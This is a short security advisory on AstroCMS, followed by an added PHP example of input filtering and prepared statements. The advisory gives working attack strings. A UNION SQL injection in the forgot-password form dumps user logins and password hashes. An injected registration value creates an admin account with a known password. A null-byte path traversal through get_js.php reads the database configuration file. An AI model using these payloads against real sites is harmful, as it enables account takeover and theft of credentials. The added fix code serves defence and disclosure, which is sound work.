
AstroCMS Multiple Remote Vulnerabilities and Fixes

Title: AstroCMS Multiple Remote Vulnerabilities

Author: brain[pillow]

Download: http://www.astrocms.com/

SQL injection in the forgot-password form:

 /registration/forgot/ 

  

 a' union select 0,0,0,0,concat_ws(0x3a,login,password,email,status ,level),0,0,0,0,0,0,0 from auth_users where id=5# 

  

id=6 - usually admin 

  

============================================================ 

User registration:

============================================================ 

 /registration/ 

  

adrnin','4297f44b13955235245b2497399d7a93','adrnin ','okk@mail.com',1,5,'','','')# 

  

Submitting this to "login field" will add "adrnin" user with admin rights and password "123123".

Usually 5 - is admin group. 

  

============================================================ 

Content page:

============================================================ 

  

 /include/get_js.php4?fname=htdocs/include/config_mysql.inc%00.js

  

Or:

  

 /include/get_js.php?fname=htdocs/include/config_mysql.inc%00.js

Fix: filter the input.
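
One way to apply that filtering to the `fname` parameter and to the forgot-password lookup, as an added example that is not AstroCMS code and not part of the original advisory. The `JS_DIR` path, the function names `resolve_js` and `find_user_by_email`, the e-mail based lookup and the use of PDO are assumptions; `auth_users` and its columns are the ones named in the payload above.

```php
<?php
// Added example, not AstroCMS code. JS_DIR, both function names and the
// e-mail based lookup are assumptions; auth_users and its columns are the
// ones named in the advisory's payload.
const JS_DIR = '/var/www/htdocs/js'; // assumed directory of servable scripts

// Map a requested script name to a file inside JS_DIR, or null if rejected.
function resolve_js(string $fname): ?string
{
    // Plain "name.js" only: no NUL byte (%00), slash, or extra dot survives.
    if (!preg_match('/\A[A-Za-z0-9_-]+\.js\z/', $fname)) {
        return null;
    }
    $base = realpath(JS_DIR);
    $path = realpath(JS_DIR . '/' . $fname);
    if ($base === false || $path === false) {
        return null; // directory or file does not exist
    }
    // Containment check after symlinks are resolved.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Forgot-password lookup: the value is bound, never concatenated into SQL,
// so a quote or UNION in it is compared as data.
function find_user_by_email(PDO $db, string $email): ?array
{
    $stmt = $db->prepare(
        'SELECT id, login, email FROM auth_users WHERE email = ? LIMIT 1'
    );
    $stmt->execute([$email]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed inputs: the advisory's fname value (decoded) and a benign name.
foreach (["htdocs/include/config_mysql.inc\0.js", 'menu.js'] as $candidate) {
    var_dump(resolve_js($candidate));
}
```

The same bound-parameter pattern applies to the registration INSERT, where the `level` column should be set by the server rather than taken from any submitted field.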
